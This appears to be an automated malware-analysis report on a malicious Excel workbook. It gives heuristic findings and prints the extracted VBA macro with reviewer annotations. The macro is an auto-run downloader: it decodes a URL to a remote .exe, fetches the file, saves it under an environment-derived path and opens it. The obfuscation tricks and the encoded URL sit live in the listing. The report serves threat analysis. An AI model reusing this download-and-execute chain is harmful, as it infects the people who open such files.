MALICIOUS
188
Risk Score
Heuristics 6
-
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set pubbyRodger_1 = CreateObject(hubabuba(0)) -
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call. Matched line in script:
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Public Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14539 bytes |

SHA-256: a57a3cac066b387a6457a29a8c0303d41c04d69d72ca06ce6e9aa7592c27d95d
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point. This handler sits in the workbook module
' (VB_Name "ЭтаКнига", the Russian-localised name of ThisWorkbook), so Excel
' runs it when the workbook is opened with macros enabled.
' It only hands off to CenterByMan; the rest of the chain visible in this
' listing is CenterByMan -> CheckBins -> crentips -> KeepBlyading ->
' product / OnasOn -> SaveMaps.
Public Sub Workbook_Open()
Call CenterByMan
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1D387618-E5F2-4E8B-9DE5-5C675DC0F0DB}{C13F9C84-F124-4839-A5B4-36CC9976B137}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
' Module-level state shared by the auto-exec chain. The roles below are read
' off the call sites in this listing; the concrete ProgIDs and member names
' come from the hubabuba string table and are not visible in the source.
' Created from hubabuba(0) in CenterByMan; .Open / .Send are called on it and
' the property named by hubabuba(10) is read from it in SaveMaps.
Public pubbyRodger_1 As Object
' Created from hubabuba(1) in CheckBins; opened in OnasOn and driven through
' CallByName in SaveMaps.
Public pubbyRodger_2 As Object
' Result of husbanD.Environment(hubabuba(4)) in CheckBins; indexed by
' hubabuba(6) in KeepBlyading.
Public pubbyRodger_3 As Object
' Numeric tokens produced by Split(..., ":") in CheckBins; decoded to text in
' crentips.
Public pubbyRodger_7() As String
' Value read from pubbyRodger_3(hubabuba(6)) in KeepBlyading.
Public pubbyRodger_4 As String
' pubbyRodger_4 with hubabuba(12) appended (see product); passed as the first
' argument of the hubabuba(11) call and then to pubbyRodger_6.Open in SaveMaps.
Public pubbyRodger_5 As String
' Created from hubabuba(2) in CheckBins; its Open method receives
' pubbyRodger_5 at the end of SaveMaps.
Public pubbyRodger_6 As Object
' String table: Split(UserForm1.Label1.Caption, "/") in CenterByMan. The
' caption text lives in the form data, not in this extracted source.
Public hubabuba() As String
' The three variables below are not referenced anywhere else in this listing.
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' Sum of the range.
' For every worksheet row from startRow to endRow, adds up the numeric cells in
' the columns listed in arrCol (iterated from index 0) and returns the totals
' as an (n x 1) array. Non-numeric cells are skipped.
' NOTE(review): nothing in this listing calls rngCol.
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim totals()
    Dim rowIdx As Integer
    Dim colIdx As Integer
    Dim rowTotal As Double
    ReDim totals(1 To endRow - startRow + 1, 1 To 1)
    For rowIdx = startRow To endRow
        rowTotal = 0
        For colIdx = 0 To UBound(arrCol)
            If IsNumeric(Cells(rowIdx, arrCol(colIdx)).Value) Then
                rowTotal = rowTotal + Cells(rowIdx, arrCol(colIdx)).Value
            End If
        Next colIdx
        totals(rowIdx - startRow + 1, 1) = rowTotal
    Next rowIdx
    rngCol = totals
End Function
' Collects, for every worksheet row from startRow to endRow, the values of the
' columns listed in arrCol into a zero-based array, and returns those row
' arrays in an (n x 1) array.
' NOTE(review): nothing in this listing calls rngArr.
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim rowsOut()
    Dim rowVals()
    Dim rowIdx As Integer
    Dim colIdx As Integer
    ReDim rowsOut(1 To endRow - startRow + 1, 1 To 1)
    For rowIdx = startRow To endRow
        ' Fresh buffer per row so each stored array is independent.
        ReDim rowVals(0 To UBound(arrCol))
        For colIdx = 0 To UBound(arrCol)
            rowVals(colIdx) = Cells(rowIdx, arrCol(colIdx)).Value
        Next colIdx
        rowsOut(rowIdx - startRow + 1, 1) = rowVals
    Next rowIdx
    rngArr = rowsOut
End Function
' Returns a zero-based array holding the consecutive integers start..ending.
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
    Dim seq()
    Dim offset As Integer
    ReDim seq(0 To ending - start)
    For offset = 0 To ending - start
        seq(offset) = start + offset
    Next offset
    rng = seq
End Function
' First stage of the auto-exec chain (called from Workbook_Open).
' Builds the string table and instantiates the first COM object, then hands
' off to CheckBins.
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
' The string table is read from a UserForm label caption and split on "/".
' The caption is stored with the form, not in the VBA source, so none of the
' ProgIDs or member names used later appear in macros.bas. Triage should also
' dump the UserForm1 streams to recover them.
hubabuba = Split(UserForm1.Label1.Caption, "/")
' Jump to the label on the very next line: no effect on execution, it only
' makes the flow look like ordinary error-handling code.
GoTo ErrExit
ErrExit:
' ProgID comes from table slot 0 (this is the line matched by OLE_VBA_CREATEOBJ).
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
' Not reachable in this listing: no On Error statement or GoTo targets
' husbanDip here, and AD is not defined anywhere in the extracted source.
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
' Prints every key/value pair of Me.dict to the Immediate window.
' Whether values are arrays is decided from the first entry only; array values
' are rendered through a_toString.
' NOTE(review): this sits in a standard module (Module1) yet uses Me, and it is
' not called anywhere in this listing.
Public Function p()
    Dim valuesAreArrays As Boolean
    Dim key
    ' Inspect just the first entry, then stop.
    For Each key In Me.dict.Keys
        valuesAreArrays = IsArray(Me.dict(key))
        Exit For
    Next key
    For Each key In Me.dict.Keys
        If valuesAreArrays Then
            Debug.Print key & " " & a_toString(Me.Item(key))
        Else
            Debug.Print key & " " & Me.Item(key)
        End If
    Next key
End Function
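' Renders the elements of arr as a bracketed, comma-separated string,
' e.g. Array(1, 2) -> "[ 1,  2 ]".
' Each element is prefixed with a space and any "," inside it becomes ".".
' An array with no elements yields "[ ]"; the original trimmed two characters
' from the one-character string "[" in that case and raised a run-time error.
Public Function a_toString(ByVal arr As Variant) As String
    Dim res As String
    Dim i
    res = "["
    For Each i In arr
        res = res & Replace(" " & i, ",", ".") & ", "
    Next i
    ' Drop the trailing ", " only when at least one element was appended.
    If Len(res) > 1 Then
        res = Left(res, Len(res) - 2)
    End If
    a_toString = res & " ]"
End Function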
' Prints every key of Me.dict to the Immediate window, one per line.
' NOTE(review): not called anywhere in this listing.
Public Function pk()
    Dim key
    For Each key In Me.dict.Keys
        Debug.Print key
    Next key
End Function
' Final stage of the chain (called from OnasOn): moves data from pubbyRodger_1
' into pubbyRodger_2, has pubbyRodger_2 write to the path in pubbyRodger_5, and
' then passes that same path to pubbyRodger_6.Open.
' Every member name is taken from the hubabuba table and invoked through
' CallByName, so no method or property name appears as a literal in the source.
' NOTE(review): the call shapes (read a property, pass it to a one-argument
' method, then a method taking (path, 2)) look like a response body being
' written to disk and saved — confirm against the UserForm1 caption strings.
Public Sub SaveMaps()
' Property read (VbGet) on the object that crentips opened and KeepBlyading
' sent. rbp is not declared anywhere in this listing.
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
Dim objStor As Variant
' Method call that hands the value just read to pubbyRodger_2.
CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
' Method call taking the target path and the literal 2.
CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
' Unconditional jump over the ErrExit block below; control-flow noise.
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
' Hands the path that was just written to the third COM object's Open method.
pubbyRodger_6.Open (pubbyRodger_5)
End Sub
Attribute VB_Name = "Module4"
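' Serialises pDict as a JSON object of the form
' {"name": k, "children": [{"name": key, "size": value}, ...]}, using Chr(13)
' as the line separator. Double quotes are stripped from keys and "," in
' values is replaced by ".".
' With an empty pDict the original trimmed the opening "[" instead of a
' trailing comma and produced invalid JSON; the trim is now applied only when
' at least one child was written. Output for a non-empty pDict is unchanged.
' NOTE(review): k is emitted without escaping; pDict is not defined in this
' listing and nothing here calls toJSON.
Public Function toJSON(Optional ByVal k As String = "root") As String
    Dim res As String
    Dim ky
    Dim hasChildren As Boolean
    res = "{""name"":""" & k & """," & Chr(13)
    res = res & """children"":[" & Chr(13)
    For Each ky In pDict.Keys
        res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
        hasChildren = True
    Next ky
    ' Remove the trailing "," & Chr(13) left by the last child, if any.
    If hasChildren Then
        res = Left(res, Len(res) - 2)
    End If
    toJSON = res & Chr(13) & "]}"
End Function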
Attribute VB_Name = "Module3"
' Applies operation between every array stored in pDict and operand2, returning
' the results in a new Dicts object.
' operand2 may be a number (applied to every key) or a Dicts-like object, in
' which case only keys present in both are processed.
' NOTE(review): Dicts and pDict are not defined in this listing, and nothing
' here calls productRng.
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
    Dim key
    Dim out As Variant
    Dim scalarOperand As Boolean
    Set out = New Dicts
    Call out.ini
    scalarOperand = IsNumeric(operand2)
    For Each key In pDict.Keys
        If scalarOperand Then
            out.dict(key) = productArr(pDict(key), operation, operand2)
        ElseIf operand2.dict.Exists(key) Then
            out.dict(key) = productArr(pDict(key), operation, operand2.dict(key))
        End If
    Next key
    Set productRng = out
End Function
' Element-wise arr1(i) <operation> arr2, where arr2 is either a single number
' or an array indexed like arr1. Each expression is built as text (with ","
' turned into ".") and handed to Application.Evaluate.
' NOTE(review): operation and the operands are concatenated into the string
' that Excel evaluates, so this must only ever see trusted values.
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
    Dim out
    Dim idx
    Dim scalarRhs As Boolean
    ReDim out(LBound(arr1) To UBound(arr1))
    scalarRhs = IsNumeric(arr2)
    For idx = LBound(arr1) To UBound(arr1)
        If scalarRhs Then
            out(idx) = Application.Evaluate(Replace(arr1(idx) & operation & arr2, ",", "."))
        Else
            out(idx) = Application.Evaluate(Replace(arr1(idx) & operation & arr2(idx), ",", "."))
        End If
    Next idx
    productArr = out
End Function
' Decodes the numeric tokens in pubbyRodger_7 into a string and passes it to
' pubbyRodger_1.Open, then continues with KeepBlyading.
' The parameter nY is never read and no return value is assigned.
' NOTE(review): Open(hubabuba(5), <decoded string>, False) followed by Send in
' KeepBlyading looks like a synchronous HTTP request object — confirm against
' the UserForm1 caption strings.
Public Function crentips(nY As Integer) As String
Dim pubbyRodger_8 As Integer
Dim pubbyRodger3_1 As String
pubbyRodger3_1 = ""
' Jump to the label on the next line; control-flow noise.
GoTo s2
s2:
' Decoding: each token is an integer equal to the character code plus 1000.
For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
Next pubbyRodger_8
GoTo SIDR4
SIDR4:
' First argument comes from the string table, second is the decoded string,
' third is the literal False.
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
End Function
' Copies the Dicts-like object d into a new Dicts.
' For l > 1 every value is itself cloned recursively with depth l - 1;
' otherwise values are copied by plain assignment.
' NOTE(review): Dicts is not defined in this listing and nothing here calls
' clone__ other than itself.
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
    Dim copy As New Dicts
    Dim key
    Call copy.ini
    For Each key In d.dict.Keys
        If l > 1 Then
            Set copy.dict(key) = clone__(d.dict(key), l - 1)
        Else
            copy.dict(key) = d.dict(key)
        End If
    Next key
    Set clone__ = copy
End Function
' Second stage of the chain (called from CenterByMan): stores the encoded
' string, creates the remaining COM objects from the string table, and calls
' crentips.
Public Sub CheckBins()
' Encoded indicator: colon-separated integers, each a character code plus 1000
' (crentips subtracts 1000 and applies Chr). Decoded and defanged for
' blocklisting / log searches:
'   hxxp://korporativ[.]laserfront[.]dp[.]ua/img/background/76ghby6f45[.]exe
pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1107:1111:1114:1112:1111:1114:1097:1116:1105:1118:1046:1108:1097:1115:1101:1114:1102:1114:1111:1110:1116:1046:1100:1112:1046:1117:1097:1047:1105:1109:1103:1047:1098:1097:1099:1107:1103:1114:1111:1117:1110:1100:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")
' The five locals below are declared but never used in this procedure.
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set pubbyRodger_2 = CreateObject(hubabuba(1))
' Unconditional jump over the ErrExit block; control-flow noise.
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set pubbyRodger_6 = CreateObject(hubabuba(2))
' husbanD is never declared in this listing.
' NOTE(review): an object exposing Environment(<name>) fits the report's
' "Reference to Windows Script Host" finding — confirm the ProgID from the
' UserForm1 caption strings.
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
' Returns a new Dicts holding only the pDict entries whose key matches reg
' (reg must expose a test(key) method).
' NOTE(review): Dicts and pDict are not defined in this listing, and nothing
' here calls filterInklude.
Public Function filterInklude(ByVal reg As Object) As Variant
    Dim key
    Dim kept As Variant
    Set kept = New Dicts
    Call kept.ini
    For Each key In pDict.Keys
        If reg.test(key) Then kept.dict(key) = pDict(key)
    Next key
    Set filterInklude = kept
End Function
' Returns a new Dicts with the same keys as pDict and every value set to
' constant. When constant is omitted, 1 is used.
' NOTE(review): Dicts and pDict are not defined in this listing, and nothing
' here calls constDict.
Public Function constDict(Optional ByVal constant As Variant) As Variant
    Dim key
    Dim filled As Variant
    Set filled = New Dicts
    Call filled.ini
    If IsMissing(constant) Then constant = 1
    For Each key In pDict.Keys
        filled.dict(key) = constant
    Next key
    Set constDict = filled
End Function
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
' NOTE(review): the header above does not match the signature below, which
' takes no parameters.
' What actually executes: isNum is set, pubbyRodger_5 is seeded from
' pubbyRodger_4, control jumps to LABZ4, hubabuba(12) is appended to
' pubbyRodger_5, and the function exits. Everything else in the body is
' unreachable. Called from KeepBlyading; the resulting path is consumed in
' SaveMaps.
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
' Start of the output path: the value KeepBlyading read from pubbyRodger_3.
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
' Skipped by the GoTo above. IsNumericOperation is not defined in this listing.
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
' Append table slot 12 to complete the path.
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function
' Unreachable from here on. operand2, operation and pDict are not defined in
' this listing, and the Application references are spelled with stray dots
' ("App.lication", "Appli.cation", "Applica.tion").
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
' Prepares pubbyRodger_2 and hands off to SaveMaps (called from KeepBlyading
' after product has built the output path).
' NOTE(review): setting a property to 1 and then calling Open matches a stream
' object being put into binary mode — confirm the property name from the
' UserForm1 caption strings.
Public Sub OnasOn()
' Property assignment (VbLet): the property named by table slot 7 is set to 1.
CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
pubbyRodger_2.Open
' Unconditional jump over the ErrExit block; control-flow noise.
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
' Folds the arrays stored in pDict position by position: with sign "+" the
' result holds per-index sums, with any other sign per-index products.
' The result array takes its bounds from the first entry of pDict.
' NOTE(review): pDict is not defined in this listing and nothing here calls
' reduceRngVertical.
Public Function reduceRngVertical(ByVal sign As String) As Variant
    Dim key
    Dim idx
    Dim acc()
    Dim hi As Integer
    Dim lo As Integer
    Dim additive As Boolean
    Dim initialised As Boolean
    additive = (sign = "+")
    For Each key In pDict.Keys
        ' Size and seed the accumulator from the first entry only.
        If Not initialised Then
            hi = UBound(pDict(key))
            lo = LBound(pDict(key))
            ReDim acc(lo To hi)
            initialised = True
            For idx = lo To hi
                If additive Then
                    acc(idx) = 0
                Else
                    acc(idx) = 1
                End If
            Next idx
        End If
        For idx = lo To hi
            If additive Then
                acc(idx) = acc(idx) + pDict(key)(idx)
            Else
                acc(idx) = acc(idx) * pDict(key)(idx)
            End If
        Next idx
    Next key
    reduceRngVertical = acc
End Function
' Reduces arr to a single value: the sum of its elements for sign "" or "+",
' their product for sign "*". Any other sign leaves the result Empty.
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
    Dim total As Variant
    Dim elem
    Select Case sign
        Case "", "+"
            total = 0
            For Each elem In arr
                total = total + elem
            Next elem
        Case "*"
            total = 1
            For Each elem In arr
                total = total * elem
            Next elem
    End Select
    reduceArray = total
End Function
' Returns a new Dicts containing key -> key for every pDict entry whose value
' makes the expression in operation evaluate to True. The value's text replaces
' placeholder in operation before evaluation; with hasThousandSep = True any
' "," in the value is first replaced by ".".
' NOTE(review): the expression string is handed to Application.Evaluate, so
' operation and the stored values must be trusted. Dicts and pDict are not
' defined in this listing, and nothing here calls filterVal.
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
    Dim key
    Dim valueText As String
    Dim matched As Variant
    Set matched = New Dicts
    Call matched.ini
    For Each key In pDict.Keys
        If hasThousandSep Then
            valueText = Replace(pDict(key) & "", ",", ".")
        Else
            valueText = pDict(key) & ""
        End If
        If Application.Evaluate(Replace(operation, placeholder, valueText)) Then
            matched.dict(key) = key
        End If
    Next key
    Set filterVal = matched
End Function
' Third stage of the chain (called from crentips): sends the request opened in
' crentips, reads one value from pubbyRodger_3, then runs product and OnasOn.
' Only the Send call and the lines from SIDR4 onward execute; the block in
' between is skipped by the GoTo.
Public Sub KeepBlyading()
pubbyRodger_1.Send
GoTo SIDR4
' Unreachable. keepOriginalVal, dict2, pDict and Add are not defined in this
' listing.
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
' Looks up the entry named by table slot 6 in the collection obtained from
' husbanD.Environment(...) in CheckBins.
' NOTE(review): presumably an environment variable holding a writable
' directory — confirm from the UserForm1 caption strings.
pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1
SIDR1:
' product builds the output path in pubbyRodger_5; OnasOn leads to SaveMaps.
product
OnasOn
End Sub
' Returns a new Dicts holding only the pDict entries whose key does NOT match
' reg (reg must expose a test(key) method).
' NOTE(review): Dicts and pDict are not defined in this listing, and nothing
' here calls filterExklude.
Public Function filterExklude(ByVal reg As Object) As Variant
    Dim key
    Dim kept As Variant
    Set kept = New Dicts
    Call kept.ini
    For Each key In pDict.Keys
        If Not reg.test(key) Then kept.dict(key) = pDict(key)
    Next key
    Set filterExklude = kept
End Function